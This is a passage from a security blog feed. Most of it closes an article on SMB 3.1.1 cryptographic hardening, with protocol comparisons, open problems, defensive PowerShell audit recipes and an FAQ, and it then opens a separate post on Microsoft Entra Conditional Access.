&lt;p&gt;&lt;strong&gt;1. Pre-authentication integrity is dialect-internal.&lt;/strong&gt; The mechanism binds the negotiation transcript to the session key inside SMB. It cannot stop an in-path attacker from refusing to forward a connection at all. Denial of service is structurally outside the threat model of any signing or encryption primitive; the only defence is path redundancy.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. Signing requires both endpoints to support it.&lt;/strong&gt; A 24H2 client refuses to talk unsigned to a pre-24H2 server only if the server is willing to sign. A pre-24H2 server that runs without signing turned on -- the long tail of consumer NAS, embedded appliances, older Linux Samba installs, ESXi datastores -- still answers an unsigned NEGOTIATE and still produces an unsigned session. The omission-downgrade is closed only for 24H2-to-24H2 pairs (or 24H2-to-Samba-4.15+ pairs). The legacy fleet upgrades over years, not weeks.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Encryption is not authenticated key exchange.&lt;/strong&gt; The SMB session key derives from the authentication protocol&apos;s session secret -- the NTLM &lt;code&gt;ExportedSessionKey&lt;/code&gt; or the Kerberos service-ticket session key [@ms-smb2-pdf]. SMB inherits whatever weakness the authentication protocol carries. A user with a 30-bit-entropy password who authenticates with NTLM has a session key whose effective entropy is bounded above by the password&apos;s. AES-256-GCM does not save that user; the symmetric ciphers are working as advertised, but the secret they are protecting is too weak to survive an offline attack on the password hash.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; SMB encryption is upper-bounded by the password entropy of the authentication protocol that derived the session key. AES-256 does not improve a weak password. Pre-authentication integrity does not improve a weak password. The cryptographic primitives are doing what they say they do; the limit is one layer higher.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is the protocol-level analogue of the older cryptographic adage that you cannot create entropy from key-stretching alone. PBKDF2 with a million iterations slows an attacker down by a factor of a million, but if the password has 30 bits of entropy, the work factor is still 2^30 -- a million iterations on a modern GPU is on the order of an hour for a single targeted password.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. SMB-over-QUIC binds the trust anchor to TLS 1.3 PKI.&lt;/strong&gt; Over TCP/445, SMB trusts only Kerberos or NTLM. Over QUIC, SMB additionally trusts the certificate authorities in the client&apos;s TLS trust store.&lt;/p&gt;
&lt;p&gt;A compromised CA in that store can MITM SMB-over-QUIC the way it MITMs HTTPS. The inner SMB layer&apos;s pre-authentication integrity will catch tampering with the SMB session itself, but the outer QUIC layer is now in the threat model. Whether this is a feature or a regression depends on whether you trust your TLS trust store more than you trust the Kerberos service that issues your tickets.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Cross-protocol relay survives single-protocol hardening.&lt;/strong&gt; This is the strongest impossibility result that touches SMB. If protocol A (SMB) coerces an outbound authentication from a victim host, and the attacker relays that authentication cross-protocol to a target running protocol B (HTTPS to AD CS Web Enrollment) that does not require signing, no amount of hardening on protocol A&apos;s session layer prevents the attack.&lt;/p&gt;
&lt;p&gt;The fix has to live in the target&apos;s session layer (EPA on &lt;code&gt;/certsrv/&lt;/code&gt;) or in the authentication protocol itself (NTLM disablement). Closing it at the SMB layer is, in the precise cryptographic sense, impossible.&lt;/p&gt;

The observation that the effective security of an SMB session against an offline attack is bounded above by the entropy of the authentication-protocol shared secret that derived the SMB session key, not by the bit length of the negotiated AES cipher. A 256-bit cipher protecting a session key derived from a 30-bit-entropy password offers, against an offline attacker who can capture the authentication exchange, no more than 30 bits of work-factor security. SMB inherits this property from any authentication protocol whose key-establishment phase is a password-equivalent shared-key derivation.
&lt;p&gt;Of these five, three are deployment posture and two are structural. You can fix #2 by replacing the legacy fleet. You can fix #4 by curating your TLS trust store, removing CAs you do not need to trust, and pinning the AD CS PKI explicitly. You can fix #5 by removing NTLM, which Microsoft is in the middle of doing. Limits #1 (denial of service) and #3 (password-equivalence) are not deployment posture; they are properties of the underlying cryptographic objects, and they will be true of any SMB-shaped protocol that inherits a session key from an authentication exchange.&lt;/p&gt;
&lt;h2&gt;8. Competing Protocols, Parallel Paths&lt;/h2&gt;
&lt;p&gt;SMB is one of four families of file-sharing protocols a modern enterprise might deploy. Each made different cryptographic choices, and each got something right that the others got wrong.&lt;/p&gt;
&lt;h3&gt;NFS v4.2 with &lt;code&gt;sec=krb5p&lt;/code&gt;&lt;/h3&gt;
&lt;p&gt;NFS version 4, standardised in RFC 7530 [@rfc7530] and refined in RFC 8881 for the 4.1 minor version [@rfc8881], replaced the optional RPCSEC_GSS security flavour of NFSv3 with a mandatory authentication negotiation step. With &lt;code&gt;sec=krb5p&lt;/code&gt;, NFS authenticates each user with a Kerberos service ticket and encrypts each RPC payload with the Kerberos session key.&lt;/p&gt;
&lt;p&gt;The cipher matrix tracks Kerberos&apos;s: RFC 8009 (October 2016) defined enctype 19 (AES-128-CTS-HMAC-SHA-256-128) and enctype 20 (AES-256-CTS-HMAC-SHA-384-192), and &lt;code&gt;sec=krb5p&lt;/code&gt; on a modern Linux client and server uses enctype 20 by default [@rfc8009]. The cryptographic posture is genuinely comparable to SMB 3.1.1 with AES-256-GCM. The differences are platform (NFS is native to Linux and Unix, SMB is native to Windows) and the way transcript binding is achieved (NFS relies on the underlying GSS context binding rather than a separate hash chain).&lt;/p&gt;
&lt;p&gt;NFS-over-QUIC is in IETF draft. The most recent revision of &lt;code&gt;draft-cel-nfsv4-rpc-over-quicv1&lt;/code&gt;, dated 16 May 2026, is at revision -05 and is not yet on a standards-track timeline [@draft-nfs-rpc-over-quic]. SMB-over-QUIC went generally available in November 2021. NFS is roughly four years behind on this transport.&lt;/p&gt;
&lt;h3&gt;WebDAV over HTTPS&lt;/h3&gt;
&lt;p&gt;WebDAV, defined in RFC 4918 [@rfc4918], is HTTP with the verbs &lt;code&gt;PROPFIND&lt;/code&gt;, &lt;code&gt;PROPPATCH&lt;/code&gt;, &lt;code&gt;MKCOL&lt;/code&gt;, &lt;code&gt;COPY&lt;/code&gt;, &lt;code&gt;MOVE&lt;/code&gt;, &lt;code&gt;LOCK&lt;/code&gt;, and &lt;code&gt;UNLOCK&lt;/code&gt;. Its security model is &quot;use TLS.&quot; The OPTIONS and PROPFIND prologue messages that a WebDAV client exchanges with a server are not transcript-bound at the WebDAV layer. The binding lives entirely in the TLS handshake.&lt;/p&gt;
&lt;p&gt;For internet-facing file access that does not need Active Directory integration, WebDAV is a sound choice, and it remains a common SMB alternative for shipping documents to mobile clients. For AD-integrated scenarios, where SMB&apos;s Kerberos integration is the point, WebDAV does not compete.&lt;/p&gt;
&lt;h3&gt;FTPS and SFTP&lt;/h3&gt;
&lt;p&gt;FTPS (RFC 4217 [@rfc4217]) adds opt-in TLS to FTP via the &lt;code&gt;AUTH TLS&lt;/code&gt; command, which is structurally similar to SMTP&apos;s STARTTLS or LDAP&apos;s StartTLS. The opt-in nature is its weakness; the historical &quot;stripping&quot; attacks against opt-in TLS apply to FTPS just as they applied to opt-in NEGOTIATE bits in SMB.&lt;/p&gt;
&lt;p&gt;SFTP runs over SSH-2 (RFC 4253 [@rfc4253]). Because SSH-2 mandatorily encrypts the transport layer, and because the SSH key exchange (§8 of RFC 4253) produces an exchange hash that is signed by the server&apos;s host key and binds the entire key-exchange transcript, SFTP gets transcript binding for free from its substrate.&lt;/p&gt;
&lt;p&gt;The closest cryptographic posture to SMB 3.1.1&apos;s pre-authentication integrity is, structurally, SFTP-over-SSH-2. Both protocols bind the entire negotiation into the session-key derivation. Both make tampering produce key divergence rather than detectable mismatch. SSH took ten years to get there; SMB took twenty-five.&lt;/p&gt;
&lt;p&gt;The reason SFTP is a popular SMB alternative in regulatory-burdened environments is precisely that the transport is mandatorily encrypted and the transcript is mandatorily bound. A PCI-DSS auditor who is asked whether a file transfer was protected against in-path tampering can point to RFC 4253 §8 and the SSH exchange-hash signature, and the answer is yes by construction.&lt;/p&gt;
&lt;h3&gt;Samba&lt;/h3&gt;
&lt;p&gt;Samba is the canonical open-source SMB server. The project tracks the Microsoft cipher matrix with a lag that has varied between months and years.&lt;/p&gt;
&lt;p&gt;Samba 4.15.0 (September 2021) added the SMB3 signing-algorithm-negotiation parameters and fixed AES-256-GCM/CCM server-side support [@samba-4-15-0]. Samba 4.23.0 (September 2025) added SMB-over-QUIC for both &lt;code&gt;smbd&lt;/code&gt; and &lt;code&gt;smbclient&lt;/code&gt;, closing the four-year interop gap with the Microsoft November 2021 SMB-over-QUIC release [@samba-4-23-0]. The Samba team has consistently been the authoritative third-party implementer of the SMB cipher matrix. The gap between Microsoft and Samba is the practical floor on how quickly the SMB world can absorb a new cipher.&lt;/p&gt;
&lt;h3&gt;SMB Direct&lt;/h3&gt;
&lt;p&gt;SMB Direct is not a competitor; it is a parallel transport. Defined in &lt;code&gt;[MS-SMBD]&lt;/code&gt; and shipped with Windows Server 2012 [@smb-direct], SMB Direct runs SMB over RDMA fabrics (RoCE or iWARP) on the LAN, bypassing the kernel TCP stack for high-throughput, low-latency file workloads.&lt;/p&gt;
&lt;p&gt;Encryption with placement was added in Windows Server 2022 [@smb-direct]. SMB Direct does not run over QUIC, because QUIC&apos;s user-space encryption is incompatible with RDMA&apos;s kernel-bypass placement model. The two transports are deployed for different workloads: SMB Direct on the data centre LAN, SMB-over-QUIC on the wide area.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Protocol&lt;/th&gt;
&lt;th&gt;Transport&lt;/th&gt;
&lt;th&gt;Encryption default&lt;/th&gt;
&lt;th&gt;Signing default&lt;/th&gt;
&lt;th&gt;Authentication&lt;/th&gt;
&lt;th&gt;Transcript binding&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;SMB 3.1.1 over TCP/445&lt;/td&gt;
&lt;td&gt;TCP/445&lt;/td&gt;
&lt;td&gt;Opt-in (Server 2025)&lt;/td&gt;
&lt;td&gt;Required by default (24H2)&lt;/td&gt;
&lt;td&gt;Kerberos or NTLM&lt;/td&gt;
&lt;td&gt;Pre-auth integrity (SHA-512 into SP 800-108 KDF)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMB-over-QUIC&lt;/td&gt;
&lt;td&gt;UDP/443&lt;/td&gt;
&lt;td&gt;TLS 1.3 (QUIC) + opt-in SMB AES-GCM&lt;/td&gt;
&lt;td&gt;Required by default (24H2 client)&lt;/td&gt;
&lt;td&gt;Kerberos or NTLM + TLS 1.3 cert&lt;/td&gt;
&lt;td&gt;Pre-auth integrity inside QUIC + TLS 1.3 transcript hash&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;NFSv4.2 &lt;code&gt;sec=krb5p&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;TCP (and QUIC draft)&lt;/td&gt;
&lt;td&gt;AES-256-GCM via RFC 8009&lt;/td&gt;
&lt;td&gt;Per-RPC GSS integrity&lt;/td&gt;
&lt;td&gt;Kerberos&lt;/td&gt;
&lt;td&gt;Kerberos GSS context binding&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WebDAV over HTTPS&lt;/td&gt;
&lt;td&gt;TCP/443&lt;/td&gt;
&lt;td&gt;TLS-mandated&lt;/td&gt;
&lt;td&gt;TLS-mandated&lt;/td&gt;
&lt;td&gt;HTTP authentication header&lt;/td&gt;
&lt;td&gt;TLS 1.3 transcript hash only&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SFTP over SSH-2&lt;/td&gt;
&lt;td&gt;TCP/22&lt;/td&gt;
&lt;td&gt;Mandatory&lt;/td&gt;
&lt;td&gt;Mandatory&lt;/td&gt;
&lt;td&gt;SSH user authentication&lt;/td&gt;
&lt;td&gt;Exchange-hash signed by host key&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Across the four families, the convergence in 2026 is unmistakable. All paths lead to &lt;em&gt;authenticated transcript binding plus an AEAD over an established session key.&lt;/em&gt; SMB took twenty-five years to get there. SSH took ten. The two protocols arrived at the same shape from different starting points -- one a file-sharing protocol that picked up TLS-like primitives, the other a remote-shell protocol that always had them.&lt;/p&gt;
&lt;h2&gt;9. Open Problems for 2026 to 2028&lt;/h2&gt;
&lt;p&gt;Five problems the SMB team is working on now, and at least one nobody has a credible answer to.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;1. When does encryption-required-by-default flip?&lt;/strong&gt; The 24H2 client mandate exists, but it is opt-in. Microsoft has not made a public commitment to a default-flip date for &lt;code&gt;RequireEncryption $true&lt;/code&gt; [@smb-security-hardening].&lt;/p&gt;
&lt;p&gt;The stakes are real: passive eavesdropping on an unencrypted SMB session over TCP/445 still recovers the file contents. The deployment-side argument for not flipping yet is the long tail of pre-24H2 clients that cannot negotiate SMB encryption at all. A unilateral server-side flip locks them out. The deployment-side argument for flipping is that signing-required already locks them out of any signed share, and the marginal incompatibility cost is small. The decision is calendar, not cryptography.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;2. NTLM removal interplay.&lt;/strong&gt; Microsoft&apos;s three-phase NTLM disablement programme is on a multi-year timeline, with the explicit goal of removing the legacy authentication protocol from Windows entirely. The interaction with SMB is structural: an SMB session over Kerberos derives its keys differently than an SMB session over NTLM, and a long tail of NAS appliances and embedded SMB servers still expect NTLM.&lt;/p&gt;
&lt;p&gt;The transition pattern is: Kerberos by default, NTLM as a configurable fallback, NTLM disabled for outbound, NTLM removed. The PetitPotam class disappears the moment NTLM is gone. The cross-protocol relay requires the relayed authentication to be NTLM, because Kerberos service tickets are bound to a specific service principal and cannot be relayed to a different service.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;3. Post-quantum key exchange for SMB-over-TCP/445.&lt;/strong&gt; SMB-over-QUIC inherits TLS 1.3&apos;s &lt;a href=&quot;https://paragmali.com/blog/post-quantum-cryptography-on-windows-the-thirty-year-migrati/&quot; rel=&quot;noopener&quot;&gt;hybrid post-quantum KEM groups&lt;/a&gt; (ML-KEM-based [@nist-fips-203], currently being deployed by major browsers and CDNs). SMB-over-TCP/445 has no protocol-level key-exchange step; it inherits whatever the authentication protocol provides.&lt;/p&gt;
&lt;p&gt;Kerberos and NTLM today have no PQC posture. The SMB session key is therefore unprotected against a &quot;harvest now, decrypt later&quot; attacker with a future cryptanalytically relevant quantum computer. The fix is either (a) move long-confidentiality workloads to SMB-over-QUIC to get TLS 1.3&apos;s hybrid KEM, or (b) wait for Kerberos to absorb a hybrid PQC enctype.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;4. Cross-protocol relay survival.&lt;/strong&gt; PetitPotam-style attacks are not closeable at the SMB layer (see Section 7, limit #5). The structural fix is NTLM removal, which is problem #2 above. In the interim, the deployment-side defence is Extended Protection for Authentication on every NTLM-accepting endpoint -- AD CS Web Enrollment is the canonical one, but the same logic applies to LDAP, WSMan, IIS-hosted enterprise applications, and any internal HTTP service that accepts NTLM [@kb5005413].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;5. Formal analysis of the full SMB 3.1.1 handshake composition.&lt;/strong&gt; No published Tamarin or ProVerif model of the full pre-authentication integrity plus SP 800-108 KDF plus Kerberos-or-NTLM composition exists in the academic literature.&lt;/p&gt;
&lt;p&gt;Individual analyses of AES-GCM, AES-CMAC, SP 800-108, and SHA-512 are tight at the primitive level. The composition of these primitives in the SMB 3.1.1 handshake is the place where TLS 1.2 historically broke (Lucky 13, Triple Handshake, the renegotiation attack of 2009, the CBC-MAC issues of POODLE). The absence of a published formal model is the single most-cited research gap in the SMB-protocol-security literature.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Problem #5 (formal analysis) is the only one of the five that is a genuine open research problem. Problems #1, #2, and #4 are deployment-posture decisions waiting on calendar dates and platform migration. Problem #3 will look quaint by 2030, when hybrid PQC is everyone&apos;s default rather than the SMB team&apos;s. Problem #5 is hard in a different way: the composition seam between pre-authentication integrity, the SP 800-108 KDF, and the underlying authentication protocol is exactly the shape that historically produces protocol-composition vulnerabilities, and the SMB community has not yet had its TLS-1.3-formal-analysis moment.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The TLS 1.2 vulnerability history is the standard cautionary tale here. Lucky 13 (2013), POODLE (2014), the Triple Handshake (2014), and the renegotiation attack (2009) all arose at composition seams between primitives that were individually sound. The TLS 1.3 design explicitly tried to remove those seams, and the IETF process required formal models (Tamarin and ProVerif) before the protocol could go to RFC. SMB 3.1.1 has not yet been through that process, and the absence is the strongest argument for funding the work.&lt;/p&gt;
&lt;p&gt;None of these five problems undo the 25-year arc that closed in October 2024. Pre-authentication integrity remains structurally sound; the cipher matrix remains at the CNSA 2.0 ceiling; the defaults remain on. The open problems are &lt;em&gt;what comes next&lt;/em&gt;, not &lt;em&gt;what is broken&lt;/em&gt;.&lt;/p&gt;
&lt;h2&gt;10. Practical Recipes and Frequently Asked Questions&lt;/h2&gt;
&lt;p&gt;If you administer Windows estates, run a Samba server, or audit network traffic for a living, here is what changes in 2026.&lt;/p&gt;
&lt;h3&gt;A 30-minute audit&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A new Windows 11 24H2 client and a new Windows Server 2025 file server arrive with signing required by default. To verify that an existing estate matches the new posture, run on each client &lt;code&gt;Get-SmbClientConfiguration | Select RequireSecuritySignature, RequireEncryption, BlockNTLM&lt;/code&gt; and on each server &lt;code&gt;Get-SmbServerConfiguration | Select RequireSecuritySignature, EncryptData, RejectUnencryptedAccess&lt;/code&gt;. Any host where &lt;code&gt;RequireSecuritySignature&lt;/code&gt; is &lt;code&gt;False&lt;/code&gt; is at the pre-24H2 posture. Schedule those for either upgrade or a policy push. Pull &lt;code&gt;Applications and Services Logs\Microsoft\Windows\SmbClient\Audit&lt;/code&gt; to enumerate which third-party peers the estate actually fails to sign with; that audit log is the only practical way to find the long tail of NAS devices and ESXi datastores before they hit a user.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The commands below cover the recipes most administrators reach for first.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Verify 24H2 signing defaults&lt;/strong&gt;: &lt;code&gt;Get-SmbClientConfiguration | Select RequireSecuritySignature&lt;/code&gt;; &lt;code&gt;Get-SmbServerConfiguration | Select RequireSecuritySignature&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mandate encryption on the client (24H2 or later)&lt;/strong&gt;: &lt;code&gt;Set-SmbClientConfiguration -RequireEncryption $true&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mandate encryption on a specific share (server)&lt;/strong&gt;: &lt;code&gt;Set-SmbShare -Name MyShare -EncryptData $true&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block outbound NTLM fallback (24H2 or later)&lt;/strong&gt;: &lt;code&gt;Set-SmbClientConfiguration -BlockNTLM $true&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deploy SMB-over-QUIC on Server 2025&lt;/strong&gt;: install the SMB Server role, bind a TLS 1.3-capable certificate via &lt;code&gt;New-SmbServerCertificateMapping&lt;/code&gt;, and optionally configure Client Access Control to restrict which principals can connect [@smb-over-quic].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Audit which peers refuse to sign&lt;/strong&gt;: enable the SmbClient Audit channel and review entries for hosts where signing was negotiated off.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Remove SMB1 entirely&lt;/strong&gt;: &lt;code&gt;Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol&lt;/code&gt; [@smb-detect-disable].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Block TCP/445 at the network edge&lt;/strong&gt;: Microsoft&apos;s authoritative recommendation is to block inbound TCP/445 from the public internet at the corporate firewall and to use SMB-over-QUIC for any external file access [@smb-secure-traffic].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Audit PetitPotam exposure&lt;/strong&gt;: verify Extended Protection for Authentication on AD CS &lt;code&gt;/certsrv/&lt;/code&gt; per KB 5005413 [@kb5005413], and ensure the AD CS Web Enrollment endpoint is HTTPS-only with channel binding enforced.&lt;/li&gt;
&lt;/ul&gt;

On a domain-joined audit workstation that has WinRM open to every member, the following pipeline collects the list of peers that any of those members has talked to over SMB without signing in the last 24 hours: `Invoke-Command -ComputerName (Get-ADComputer -Filter * | Select -Expand DnsHostName) -ScriptBlock { Get-WinEvent -LogName &apos;Microsoft-Windows-SmbClient/Audit&apos; -MaxEvents 1000 | Where-Object { $_.Id -eq 31010 } } | Sort-Object Message -Unique`. Event ID 31010 is the SmbClient audit signal that the server did not support signing. The output is the deduplicated list of peer hostnames you need a remediation plan for.
&lt;h3&gt;Frequently asked questions&lt;/h3&gt;


No. SMB signing provides per-packet integrity (AES-CMAC, AES-GMAC, or HMAC-SHA-256 depending on the negotiated algorithm); SMB encryption wraps each packet in an AEAD (AES-CCM or AES-GCM) for confidentiality and integrity. The two are negotiated independently. For 24H2 / Server 2025 default behaviour, see the FAQ entry on the 24H2 default-on push below.


No. SMB signing on the coerced server protects the SMB session that delivers the credentials, but PetitPotam captures and relays those credentials to a different service (AD CS Web Enrollment over HTTPS) -- the defence has to live on the relay-to endpoint as Extended Protection for Authentication, not at the SMB layer [@kb5005413]. See section 6 for the mechanism and section 7 limit 5 for the impossibility framing.


No. SMB-over-QUIC is an additional transport for SMB, primarily intended for clients outside the corporate perimeter that want SMB access without a VPN. Inside the perimeter, TCP/445 remains the default transport on Windows Server 2025 [@smb-over-quic]. SMB Direct over RDMA remains the high-throughput data-centre option [@smb-direct].


No. Secure Negotiate (SMB 3.0.2, 2013) was a post-hoc FSCTL message; pre-authentication integrity (SMB 3.1.1, 2015) is a SHA-512 hash chain that enters the SP 800-108 KDF as salt, causing tampering to produce divergent keys rather than a detected mismatch [@kramer-lovinger-sdc2015][@ms-smb2-pdf]. See section 4 for the mechanism and the five-property comparison table.


AES-128-GCM has no known practical attack at the cipher-level (the GCM forgery bound from RFC 8446 and SP 800-38D applies regardless of key length [@rfc8446][@nist-sp-800-38d]). AES-256-GCM matters because CNSA 2.0 -- the U.S. NSA&apos;s algorithm suite for protecting information up to TOP SECRET -- requires a 256-bit symmetric key. Organisations that need CNSA compliance, including most U.S. federal agencies and defence contractors, must negotiate `EncryptionAlgorithmId 0x0004` (AES-256-GCM) [@ms-smb2-versioning].


Probably only on legacy Windows 10 Home or Pro pre-22H2 hosts and a few pre-Server 2019 environments. SMB1 has not been installed by default on Windows 10 since the Fall Creators Update (1709) and not on Windows Server since Server 2019 [@smb-interception-defense]. To check, run `Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol`; the `State` field will be `Disabled` on a modern install. To remove a stray install, use `Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol` [@smb-detect-disable].


No, and this is the single most-misreported fact about the 2024-2025 rollout. The default change was for *signing*, not *encryption*. SMB encryption is now mandate-able from one line of PowerShell or one Group Policy setting, but Microsoft did not flip the default-on switch. A 24H2 client speaking to a Server 2025 file share without explicit opt-in still sends file contents in cleartext on the wire, signed but not encrypted [@smb-security-hardening][@pyle-techcom-4226591].

&lt;h3&gt;Study guide&lt;/h3&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;smb-3-1-1-security&quot; keyTerms={[
  { term: &quot;SMB-relay attack class&quot;, definition: &quot;Capture-and-replay attacks on an SMB authentication exchange, relayed in real time into a fresh session against a target where the same user has access; originally demonstrated by Sir Dystic on March 31, 2001.&quot; },
  { term: &quot;Negotiate downgrade&quot;, definition: &quot;Tampering with the SMB NEGOTIATE Response so that the client and server agree on a session without signing or encryption; the load-bearing primitive of every SMB-relay attack before 2015.&quot; },
  { term: &quot;Pre-authentication integrity&quot;, definition: &quot;SMB 3.1.1 mechanism that binds every byte of the four pre-authentication messages into the salt argument of the SP 800-108 KDF that derives the SMB session keys; tampering produces divergent keys rather than a detectable mismatch.&quot; },
  { term: &quot;Secure Negotiate&quot;, definition: &quot;SMB 3.0.2 post-hoc validation FSCTL that compared client and server views of the NEGOTIATE capabilities after authentication; superseded by pre-authentication integrity in SMB 3.1.1.&quot; },
  { term: &quot;SP 800-108 KDF&quot;, definition: &quot;NIST counter-mode HMAC-SHA-256 key-derivation function used by SMB 3.x to derive per-session keys from an authentication-protocol shared secret, the role label, and the pre-authentication hash chain as context.&quot; },
  { term: &quot;AES-CMAC&quot;, definition: &quot;Block-cipher message authentication code from NIST SP 800-38B, the default SMB 3.x signing algorithm before AES-GMAC was added as a negotiable alternative in 2021.&quot; },
  { term: &quot;AES-GMAC&quot;, definition: &quot;The authentication-only mode of AES-GCM from NIST SP 800-38D, faster than AES-CMAC on hardware with PCLMULQDQ and VAES; added as a negotiable SMB signing algorithm in 2021.&quot; },
  { term: &quot;AES-256-GCM&quot;, definition: &quot;256-bit AES in Galois/Counter Mode; the CNSA 2.0-compliant SMB encryption algorithm, encoded as EncryptionAlgorithmId 0x0004 and added to SMB 3.1.1 in 2021.&quot; },
  { term: &quot;SMB-over-QUIC&quot;, definition: &quot;SMB transport over RFC 9000 QUIC and RFC 9001 TLS 1.3 on UDP/443, generally available with Windows Server 2022 Datacenter Azure Edition in November 2021 and broadened to all Server 2025 editions in 2024.&quot; },
  { term: &quot;Extended Protection for Authentication&quot;, definition: &quot;Binding of the TLS channel into the GSS channel-binding token in SPNEGO authentication, defeating cross-protocol NTLM relay by causing the relayed authentication to disagree with the channel binding observed at the relay-to endpoint.&quot; },
  { term: &quot;PetitPotam&quot;, definition: &quot;Coercion-and-relay attack disclosed by Lionel Gilles in July 2021 that uses MS-EFSRPC EfsRpcOpenFileRaw to coerce outbound NTLM authentication from a target server, then relays the authentication cross-protocol to AD CS Web Enrollment over HTTPS.&quot; },
  { term: &quot;CNSA 2.0&quot;, definition: &quot;The U.S. NSA Commercial National Security Algorithm Suite 2.0; requires AES-256 in any AEAD mode for confidentiality and AES-256-GMAC or HMAC-SHA-384 for integrity; the SMB combination is AES-256-GCM plus AES-GMAC.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;On March 31, 2001, Sir Dystic walked onto a stage in Atlanta and demonstrated an attack that should have lasted a year. It lasted twenty-three.&lt;/p&gt;
&lt;p&gt;The cryptographic primitives that closed it -- AES-CMAC, AES-128-CCM, AES-128-GCM, AES-256-GCM, AES-GMAC, the SP 800-108 KDF, SHA-512 -- arrived between 2006 and 2021. The structural mechanism that bound them into a tamper-resistant SMB session, pre-authentication integrity, arrived in July 2015. The defaults that made all of it universal arrived in October 2024.&lt;/p&gt;
&lt;p&gt;The next twenty-five years of SMB security live in the protocols above it: Kerberos, NTLM removal, post-quantum key exchange. Those will be slower, because every protocol seam between SMB and what comes above it is a place where a future Sir Dystic can find new work.&lt;/p&gt;
</content:encoded><category>smb</category><category>cryptography</category><category>windows-security</category><category>network-protocols</category><category>pre-authentication-integrity</category><category>smb-over-quic</category><category>ntlm-relay</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Who Decided This Token Is Good? A Field Guide to Conditional Access and Entra ID Protection</title><link>https://paragmali.com/blog/who-decided-this-token-is-good-a-field-guide-to-conditional-/</link><guid isPermaLink="true">https://paragmali.com/blog/who-decided-this-token-is-good-a-field-guide-to-conditional-/</guid><description>A wire-level tour of Microsoft Entra Conditional Access, Identity Protection, and Continuous Access Evaluation, plus the five things they cannot do.</description><pubDate>Tue, 26 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Conditional Access is Microsoft&apos;s Zero Trust policy engine, not a feature.** Every interactive sign-in to a licensed Microsoft 365 tenant flows through three planes: a signal plane (Entra ID Protection&apos;s machine-learning risk scoring), a policy plane (Conditional Access&apos;s JSON rule evaluator), and a session plane (Continuous Access Evaluation&apos;s event-driven revocation channel). This article assembles the wire format of all three -- the `riskDetection` resource on Microsoft Graph, the `conditionalAccessPolicy` schema, the `cp1` client capability that opts a client into 28-hour tokens, and the `401 + insufficient_claims` claims challenge -- into one end-to-end picture, then names the five things this architecture fundamentally cannot do.
&lt;h2&gt;1. Who decided this token is good?&lt;/h2&gt;
&lt;p&gt;It is 09:02 on a Tuesday in Lisbon. Alice opens Outlook on a managed laptop in a hotel and the reading pane populates with mail in under a second. She did not type a password. She did not approve a push. She did not touch a hardware key.&lt;/p&gt;
&lt;p&gt;Who decided that was fine?&lt;/p&gt;
&lt;p&gt;The question is harder than it looks. Alice&apos;s password lives in a token cache from yesterday&apos;s sign-in at the office. Outlook&apos;s client silently acquires a fresh access token from Entra. That request may match a Conditional Access policy. The policy may consult an Identity Protection risk score. The result is either an access token or a refusal. Exchange Online receives the token, validates it, and may yet revoke it mid-session because something changed in the last sixty seconds. Bytes return to Alice.&lt;/p&gt;

Microsoft Entra ID&apos;s policy engine for evaluating sign-in attempts. A Conditional Access policy is a JSON object that matches a set of users, cloud apps, and conditions (network location, device state, sign-in risk, user risk, client app, platform) against a set of grants (block, require MFA, require compliant device, require Authentication Strength, and so on). Policies are evaluated after first-factor authentication; a block grant in any matching policy overrides all allow grants [@ms-ca-overview].

The machine-learning signal plane that scores sign-ins and users for risk. ID Protection emits `riskDetection` events tagged with `riskEventType` (anonymized IP, leaked credentials, password spray, atypical travel, and roughly two dozen others), `riskLevel` (low, medium, high), `riskState`, and `detectionTimingType` (realtime, nearRealtime, or offline). Available only on Microsoft Entra ID P2 [@ms-id-protection-overview].

